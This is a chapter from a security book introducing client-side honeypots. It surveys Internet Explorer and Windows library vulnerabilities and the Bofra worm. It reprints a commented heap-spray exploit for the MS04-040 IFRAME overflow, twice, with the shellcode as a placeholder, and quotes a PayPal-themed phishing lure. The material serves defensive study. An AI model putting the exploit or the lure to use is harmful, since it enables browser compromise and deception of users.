ch08.html

8. Client Honeypots

8.1 Learning More About Client-Side Threats

8.2 Low-Interaction Client Honeypots

8.3 High-Interaction Client Honeypots

8.4 Other Approaches

8.5 Summary

Since we see more and more attackers exploiting holes in client programs (e.g., via vulnerabilities in Microsoft's Internet Explorer or Office programs), the functions of honeypots must evolve further. In this chapter, we introduce a new application of honeynets to deal with this threat. This application is based on the original idea of honeypots, but it develops it further in another direction. This cannot be done without leaving the boundaries given by the original approach: We now completely omit the passive methodology given by classical honeypots, as introduced in the previous chapters. Instead of passively waiting for an attacker and offering bait, we now actively search for malicious activities and content on the Internet. The main idea behind all client-side honeypots is to simulate the behavior of a human and to analyze whether such behavior would be exploited by a malicious attacker. For example, a client-side honeypot could be a mechanism to drive a web browser. With additional tools and techniques, the honeypot is then observed and anomalies caused by malicious websites are detected. In this chapter we focus on these web-based honeypots.

Of course, we cannot just search the whole Internet for malicious activity — not even search the whole World Wide Web for malicious websites — but we can base our search on locations that are suspicious or presumably malicious. In the following, we introduce several approaches to finding these locations and show how to use honeypots to learn more about them. This whole new field is quickly developing, and preliminary results show that this approach is viable. We present these results in detail and show how you can benefit from them.

8.1. Learning More About Client-Side Threats

In the recent years, we have seen a new trend in the way adversaries attack systems. In addition to attacks against server systems (e.g., a web or mail server), there are more and more attacks against client systems. The end user is becoming the weakest link in the whole security architecture. And since a chain is only as strong as its weakest link, we need to find ways to learn more about these client-side threats.

First, let us review what kind of attacks against client systems we have already seen. One of the most prominent examples is an attack that involve Microsoft's Internet Explorer, the web browser with the highest market share. According to the SANS Top-20 Internet Security Attack Targets for 2006 [76 ], Internet Explorer is the most common target for attacks. Internet Explorer had several vulnerabilities in the past, of which some were rated critical. Some of the most often exploited vulnerabilities according to our research are the following:

MS04-013 (MHTML URL Processing Vulnerability/CAN-2004-0380). By abusing the MHTML protocol handler, a remote attacker can bypass domain restrictions and execute code of his choice. Normally MHTML is used by Microsoft Outlook, but Internet Explorer also can be used as an attack vector using compiled help (CHM) files. In this case, the CHM file references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore.
MS04-040 (HTML Elements Vulnerability — IFRAME). A web page with an Inline Floating Frame (IFRAMES) tag and long values supplied to the SRC and NAME properties causes a buffer overflow. As a result, the attacker can execute the code of his choice if he tricks the victim to view a malicious web page. This vulnerability was also used by the Bofra worm in November 2004 to spread further, and we take a closer look at it in Section 8.1.1.
MS05-002 (Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution). Due to a buffer overflow in the handling of cursor, animated cursor, and icon formats (.ANI files), it is possible to remotely execute code of the attacker's choice. The attacker must construct a malicious cursor or icon file and lure the victim to visit a malicious website or view a malicious HTML e-mail message.
MS06-001 (Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution). A remote command execution is possible with the help of GDI32.DLL (Graphical Device Interface). A special meta record (SetAbortProc) within Windows Meta Files (.WMF files) can be abused to execute arbitrary user-supplied code. In this case, the attacker must convince the victim to open a malicious WMF file that could, for example, be embedded in a web page.
MS06-057 (Vulnerability in Windows Explorer Could Allow Remote Execution). Due to a improper input validation, the WebViewFolderIcon ActiveX control (webvw.dll) contains a vulnerability in the function setSlice(). This can be exploited by an attacker to execute arbitrary commands.

As you can see, there are many possible attacks. Especially in the year 2006, we have seen a rather large increase in published vulnerabilities regarding Internet Explorer. At least seven security bulletins were issued by Microsoft with regards to Internet Explorer.

Some of these vulnerabilities were zero-day (0day) attacks — that is, vulnerabilities without a patch to fix the flaw. For example, in the middle of December 2005, there were rumors about a possible vulnerability in Windows when displaying WMF files. The corresponding exploit was offered for $4000 on the black market. First advisories about this vulnerability were published on December 27. Within a couple of days, several hundred malicious websites appeared on the Internet with a WMF image that exploits this vulnerability. Most of these websites either installed a Trojan Horse or some other kind of malware on the compromised machine. On January 2, 2006, several members of the English parliament received via e-mail specially prepared WMF files, so this vulnerability could also be used for targeted attacks. Finally, on January 5, Microsoft issued a patch with Microsoft Security Bulletin MS06-001. Nevertheless, there are still attacks using this vulnerability, since not all computers are patched.

8.1.1. A Closer Look at MS04-040

As a longer and more technical example, we want to take a closer look at the vulnerability described in the Microsoft security bulletin MS04-040 to give you an overview of the threat. MS04-040 (available at http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx) describes a vulnerability in the handling of long SRC and NAME attributes within an <IFRAME> (inline floating frame) tag. This leads to a heap buffer overflow that ultimately results in the possibility of remote command execution. An attacker can take advantage of this flaw by constructing a specially crafted web page and then tricking the victim to open this web page. This can, for example, be done by embedding a link in an e-mail message, by sending the link to the victim via an instant messaging program, by linking the malicious web page from another web page (this can be almost invisible for the victim), or by other techniques related to social engineering.

A look at the timeline of this vulnerability is also interesting: It was discovered by nd@felinemenace.org in late October 2004. Shortly after he announced his findings via the mailing list BugTraq, Berend-Jan Wever posted a preliminary analysis. To trigger the buffer overflow, it is only necessary to include a tag of the form <IFRAME SRC="AAAAAAAAAAAA...." NAME="BBBBBBBBBBB...."> in an HTML file. This overflows a buffer, and as a result, the attacker has control over the processor register EAX. Due to the code following this overflow, the attacker can also get control over a few other CPU registers and ultimately control the instruction pointer EIP. This allows him to execute code of his choice. The attacker is able to fully compromise the target system.

A few days later, Berend-Jan Wever also released a proof-of-concept exploit for this vulnerability under the name Internet Exploiter v0.1, which is available at http://www.milw0rm.com/exploits/612 . The interesting idea behind this exploit is a technique now called heap spraying: The exploit code creates blocks that contain the shellcode (commands the attacker wants to execute) together with some additional information. Instead of creating only one of them, the exploit code creates 700 to be sure that at least one of them is at the right memory location. The technique of heap spraying is now one of the common building block of attacks against Internet Explorer, and you will see this in many exploits. The following listing is a shortened version of this exploit with a few more embedded comments. It gives you an overview of how such an exploit looks and how easy it is for an attacker to exploit a client's vulnerability.

Code View:
<HTML> // the following code prepares the heap in a clever way so that the // attacker can execute code of his choice. Memory is allocated and // filled with blocks consisting of NOP slides and shellcode. <SCRIPT language="javascript"> // this code will open a backdoor on a compromised machine shellcode = <shellcode for bindshell to port 28876> // Nopslide will contain these bytes: bigblock = unescape("%u0D0D%u0D0D"); // Heap blocks in IE have 20 dwords as header headersize = 20; // This is all very 1337 code to create a nopslide that will fit exactly // between the the header and the shellcode in the heap blocks we want. // The heap blocks are 0x40000 dwords big, I can't be arsed to write good // documentation for this. slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; // And now we can create the heap blocks, we'll create 700 of them to // spray enough memory to be sure enough that we've got one at 0x0D0D0D0D memory = new Array(); for (i=0;i<700;i++) memory[i] = block + shellcode; </SCRIPT>   <IFRAME SRC=file//<578 x B> NAME="<2086 x C>\x0D\x0D\x0D\x0D"> </IFRAME> </HTML>

Code View: <HTML> // the following code prepares the heap in a clever way so that the // attacker can execute code of his choice. Memory is allocated and // filled with blocks consisting of NOP slides and shellcode. <SCRIPT language="javascript"> // this code will open a backdoor on a compromised machine shellcode = <shellcode for bindshell to port 28876> // Nopslide will contain these bytes: bigblock = unescape("%u0D0D%u0D0D"); // Heap blocks in IE have 20 dwords as header headersize = 20; // This is all very 1337 code to create a nopslide that will fit exactly // between the the header and the shellcode in the heap blocks we want. // The heap blocks are 0x40000 dwords big, I can't be arsed to write good // documentation for this. slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; // And now we can create the heap blocks, we'll create 700 of them to // spray enough memory to be sure enough that we've got one at 0x0D0D0D0D memory = new Array(); for (i=0;i<700;i++) memory[i] = block + shellcode; </SCRIPT> <!-- The exploit sets eax to 0x0D0D0D0D after which this code gets executed: 7178EC02 8B08 MOV ECX, DWORD PTR [EAX] [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D. 7178EC04 68 847B7071 PUSH 71707B84 7178EC09 50 PUSH EAX 7178EC0A FF11 CALL NEAR DWORD PTR [ECX] Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D. We land inside one of the nopslides and slide on down to the shellcode. --> <!-- The actual buffer overflow with long SRC and NAME properties --> <IFRAME SRC=file//<578 x B> NAME="<2086 x C>\x0D\x0D\x0D\x0D"> </IFRAME> </HTML>

On November 8, 2004, a worm called Bofra started to spread using this vulnerability. In the first step, the worm sends e-mail messages to other victims. Within this messages, it poses as photos from an adult webcam or PayPal credit card message in an attempt to trick a victim to click on a link. The message body of the e-mail has for example the following text:

Code View:
Congratulations! PayPal has successfully charged \$175 to your credit card. Your order tracking number is A866DEC0, and your item will be shipped within three business days. To see details please click this link. DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by an automated message system and the reply will not be received. Thank you for using PayPal.

Code View: Congratulations! PayPal has successfully charged \$175 to your credit card. Your order tracking number is A866DEC0, and your item will be shipped within three business days. To see details please click this link. DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by an automated message system and the reply will not be received. Thank you for using PayPal.

Other variants of Bofra use a different text in the message body, but the aim is always the same: via techniques borrowed from the area of social engineering, the worm tries to trick the victim to click on the link. If the victim believes this scam and opens the link, the browser is redirected to a web server running on the sender's machine. This web server sends a malicious web page containing the exploit of the IFRAME vulnerability. With the help of this exploit, the Bofra worm is installed on the victim's machine, and there it starts to spread further by sending e-mail messages to contacts found on the victim's machine. In addition, it also starts a web server on the infected host so that new victims can be infected. The whole cycle then starts again. The whole process is illustrated in Figure 8.1

Figure 8.1. Spreading of Bofra worm.

[View full size image]

Finally, on December 1, 2004, Microsoft patched this vulnerability with MS04-040. So it took them about one month to release a patch. In the meantime, thousands of end user systems were infected.

8.1.2. Other Types of Client-Side Attacks

Besides Microsoft's Internet Explorer, we have also observed many other client programs that are now targeted by adversaries. Other popular Microsoft programs like Outlook/Outlook Express, Media Player, or the Office suite can be targets. But popular tools from other vendors are not safe either. In the last few years, severe remote vulnerabilities were identified in RealNetworks' RealPlayer, Mozilla Firefox, Oracle databases, AOL Instant Messenger AIM, Nullsoft Winamp media player, and Serv-U FTP server — just to name a few. This shows that you can never be sure that you are safe when you use the Internet. Presumably, one of your programs contains an exploitable vulnerability, and you must take care to avoid obvious "bad places" on the Internet. But with the help of honeypots, we can learn more about these kind of attacks!

In addition to the attacks against specific programs, there are also vulnerabilities in systemwide libraries used by client applications that can be exploited. As an example, consider a media library that renders an image or a movie. If this library has a flaw, this might be exploitable via an image viewer, your e-mail program, or the web browser you use. Thus, the vulnerability itself does not have to be within the program, but it can be within a third-party library. In the past, we have seen these kinds of vulnerabilities, especially in multimedia libraries or other parsing libraries. We have already briefly mentioned the vulnerability of WMF files in the previous section, but there are many more examples. One of the most prominent example of this type of attacks is presumably the ASN.1 vulnerability published in Microsoft Security Bulletin MS04-007 (ASN.1 Vulnerability Could Allow Code Execution — http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx ). Abstract Syntax Notation One (ASN.1) is a standard and flexible notation that describes data structures for representing, encoding, transmitting, and decoding data. It is used to describe the structure of objects that are independent of machine-specific encoding techniques. As you may guess, ASN.1 is quite complex, and lots of parsing is involved. The Microsoft ASN.1 library has a vulnerability caused by an unchecked buffer, which can result in a buffer overflow. An attacker can use this flaw to remotely execute arbitrary commands on the victim's machine. Since the flaw resides in the library, several programs like Internet Explorer, Outlook/Outlook Express, or third-party applications that use certificates are affected. In the SANS Top-20 Internet Security Attack Targets for 2006, Windows libraries are rated as the second most severe threat. To quote the SANS Top 20 list [76]:

The critical libraries affected during past year include:

Vulnerability in Windows Explorer Could Allow Remote Execution (MS06-057, MS06-015)
Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution (MS06-050)
Vulnerability in HTML Help Could Allow Remote Code Execution (MS06-046)
Vulnerability in Microsoft Windows Could Allow Remote Code Execution (MS06-043)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (MS06-026, MS06-001)
Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (MS06-002)

The preceding examples make clear that there are many attack vectors against client programs. Not only the actual program but any libraries used can also be the gateway to compromise a system. Client-side attacks are often used in targeted attacks against companies, government authorities, military targets, or other kinds of lucrative targets. For example, in 2006 there were several such attacks against organizations within the United States. The attackers used unknown vulnerabilities in Office applications (0day attack). They sent to recipients within the target organizations a few e-mail messages with attachments — for example, a Microsoft Power-Point presentation or a Microsoft Word document. These documents contained an exploit for an unknown vulnerability and installed a piece of malware on the compromised machine. With the help of this malware, it was possible for the attacker to steal confidential information or to install additional tools on the compromised machine. Titan Rain is the U.S. government's designation for a series of such targeted attacks against American computer systems since the beginning of 2003. It is not really clear who is behind these attacks (i.e., state-sponsored espionage, corporate espionage, or random hacker attacks), but they are believed to be Chinese in origin, according to investigations by Shawn Carpenter and some other researchers [54 ]. So these vulnerabilities are actually used in the wild and pose a severe threat.

8.1.3. Toward Client Honeypots

As you saw in previous sections, there is a wide variety of attacks against client application. The main question for us is how we can design honeypots to learn more about these kinds of attacks.

An idea for such a new type of honeypots are client-side honeypots. Since we see more and more attackers exploiting holes in client programs (e.g., via exploits in Microsoft's Internet Explorer), the use of honeypots must evolve further. As clients depend on the server they are working with, we need to design client-side honeypots according to the protocol of the server. They must follow the protocol of the server that we want to observe. This is where we change the classical behavior of honeypots: We do not just passively wait for attackers but actively search for malicious content. This can, for example, be achieved by simulating human behavior and then determining if our simulated system was exploited.

We differentiate between two kinds of client-side honeypots. On the one hand, these type of honeypots can be active. This is the usual behavior, since they connect to a given server, send some commands, and get back the results (e.g., web browsers). On the other hand, some client-side honeypots are passive, waiting for an event to happen (e.g., e-mail clients), which means we have to find a way to trigger that event. In the main part of this chapter, we will focus on active honeyclients, most dealing with malicious websites, since these pose the most severe threat. These web-based honeypots are currently the area in which most research happens and a few honeypot solutions have already been released.

This type of honeypot aims at finding web servers compromising the browser. The web-based honeyclient can be the target of different kinds of attacks, but most of them follow the same four phases. In the first phase, the attacker sets up the website containing at least one exploit. Most often this website does not contain only one exploit but several of them. This way the attacker can target more platforms and different version of web browsers with just one single page. In addition, the attacker often tries to obfuscate the exploit in this phase — for example, by using different encoding options, dynamically creating the content with the help of JavaScript, custom functions to decode the content, or similar options. With the help of these obfuscation techniques, the actual exploit can very often evade an intrusion detection system or similar defensive countermeasures. In addition, it complicates the analysis task for a human investigator.

In the optional second phase, the attacker sets up a network of malicious websites. Very often one bad site redirects the victim automatically to another bad site or embeds another site into the current one. This is used to deliver additional exploits or other content to the victim. The redirect can, for example, be implemented with the help of JavaScript (e.g., window.open() or window. location.href()) by using HTTP redirection via a 302 (Temporary Redirect) message or an HTML element like <meta http-equiv="refresh" content="..."> or <iframe src="...". A very common process is to have a "dispatcher" page that detects the version of the victim's operating system and web browser and then redirects him to the appropriate exploit page. But this linking can also be across multiple websites or domains to reroute victims to additional malicious servers.

The third phase is the actual exploitation phase. Once everything is set up, the attacker has to lure victims to the trap with different techniques borrowed from the area of social engineering. He can, for example, send mass e-mails containing links, send instant messages via common IM software, lure users on social network sites, distribute the link via a peer-to-peer application, and so on. Once the victim clicks on the link, he is redirected to the malicious website and the exploitation takes place.

Once the attacker has exploited a vulnerability on the victim's system, he typically wants to install some kind of malware on the compromised machine. This helps him to gain complete control over the system, and he can also use it for other purposes — for example, as a stepping stone for additional attacks, to steal sensitive information, or to use it for other nefarious purposes. For example, an attacker could have the following goals:

To install an IRC bot. The goal is to install an Internet Relay Chat (IRC) bot so the infected machine becomes part of a botnet and can be remotely controlled by the attacker. The background of bots and botnets is covered in Chapter 11 , and we can learn more about different kinds of bots with the help of nepenthes, which is introduced in Chapter 6.
To install a proxy. The goal is to take control of the host and install a SOCKS proxy. A proxy is an intermediary service that acts as both a server and a client, and conducts requests on behalf of other clients. With the help of a SOCKS proxy, an attacker can, for example, send spam e-mails or do other mischief.
To install a spyware or a keylogger. The goal is to install malware that captures sensitive information from the victim's machine and sends it back to the attacker. This form of identity theft is quite common nowadays, and, for example, credit cards numbers, passwords, or cookies can be stolen from the compromised machines this way.
To install Browser Helper Objects (BHOs) or other kinds of adware. In this scenario, the attacker installs malicious extensions for the web browser, most often in the form of BHOs, which are modules designed to enhance the browser on the victim's machine. These BHOs then send advertisements to the victim or send information about the browsing behavior to the attacker. Similar mischief can be reached from the attacker by installing adware on the target. In both cases, the attacker wants to gain some financial advantage by sending ads.

Many other attack vectors are possible. Because the attacker can issue the commands of his choice, his actions are almost arbitrary. He can use the victim's machine for whatever purpose he has in mind.

Since most of the time we do not have to observe phases one and two, we will focus on the two last phases. We want to find the malicious websites and also learn more about the malware binaries installed on the victim's machine. In the following sections, we will focus on low-interaction client honeypots. We show different approaches to use the low-interaction paradigm in this new area and present preliminary results obtained by different projects. In the second half, we focus on a high-interaction approach for client honeypots. This is more challenging, and up to now there are only a limited number of projects using this concept. We show how such a high-interaction honeypot can be realized and again present preliminary results. In the academic community, some researchers have developed concepts that can also be classified as client honeypots. We present some of them and show you how you can benefit from their results. An excellent introduction to the topic of honeyclients is available in a presentation by Danford [18].